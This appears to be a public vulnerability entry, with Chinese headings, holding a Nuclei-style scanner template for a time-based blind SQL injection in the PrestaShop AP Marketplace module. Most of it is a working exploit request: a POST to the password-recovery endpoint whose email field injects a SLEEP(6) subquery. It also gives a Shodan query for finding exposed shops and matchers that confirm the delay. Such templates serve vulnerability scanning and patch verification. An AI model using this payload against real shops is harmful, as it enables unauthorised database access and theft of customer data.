漏洞描述
The AP Marketplace Prestashop module is vulnerable to Blind/Time SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL queries on the underlying database.
prestashop-apmarketplace-sqli: PrestaShop Ap Marketplace - SQL Injection
PoC代码[已公开]
id: prestashop-apmarketplace-sqli
info:
name: PrestaShop Ap Marketplace - SQL Injection
author: mastercho
severity: high
description: |
The AP Marketplace Prestashop module is vulnerable to Blind/Time SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL queries on the underlying database.
reference:
- https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/#pll_switcher
metadata:
verified: true
shodan-query: http.component:"Prestashop"
tags: time-based-sqli,prestashop,sqli,vuln
http:
- raw:
- |
@timeout: 20s
POST /m/apmarketplace/passwordrecovery HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
X-Requested-With: XMLHttpRequest
email="+AND+(SELECT+3472+FROM+(SELECT(SLEEP(6)))UTQK)--+IGIe&submit_reset_pwd=
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(body, "module-apmarketplace-passwordrecovery")'
condition: and
# digest: 4a0a004730450221009f2ef2bf90c98f759515f11c2d0737ae1d1ce9b5ba41e76692b305ca0d1986f202204de47454d5d831f09543d0902896600985aae62d1fd19021b125b9776ae3bfd2:922c64590222798bb761d5b6d8e72950